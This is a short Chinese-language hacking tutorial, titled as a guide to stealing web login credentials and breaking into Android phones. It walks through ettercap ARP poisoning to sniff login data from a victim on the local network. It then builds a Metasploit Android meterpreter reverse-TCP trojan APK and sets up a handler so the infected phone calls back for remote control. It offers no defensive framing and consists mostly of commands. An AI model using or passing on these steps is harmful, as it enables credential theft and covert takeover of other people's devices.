盗取网页登陆信息以及入侵Android手机

盗取网页登陆信息

• 启动etter

ettercap -G

• 选择扫描对象：点击Sniff->Unified Sniffing->选择网卡
• 扫描所有IP ： 点击Hosts->Scan For Hosts
• 显示当前扫描到的IP：点击Hosts->Hosts list
• 右键选择Host list列表中的目标IP，将其添加到target 1。
• 右键选择Host list列表中的路由器IP，将其添加到target 2。
• 实现远程嗅探连接：点击Mitm选项->ARP posioning->Sniff remote connections->OK

• 开始嗅探：点击Start->start sniffing
• 新建一个窗口，输入如下命令实现浏览器中登陆信息的数据抓取

ettercap -Tq -i eth0

入侵Android手机

• 利用局域网静默安装的方式实现木马病毒的强制安装

• msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.*.*(本地IP) LPORT=*(本地端口) R > /root/yellow.apk(安装路径)

  启动MSF工具

msfconsole

• 加载模块

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
show options

• 更改IP与端口

set LHOST=*.*.*.*(设置本地端口)
set LPORT=*(设置本地端口)

• 监听手机上线

exploit

• 查看常用功能

help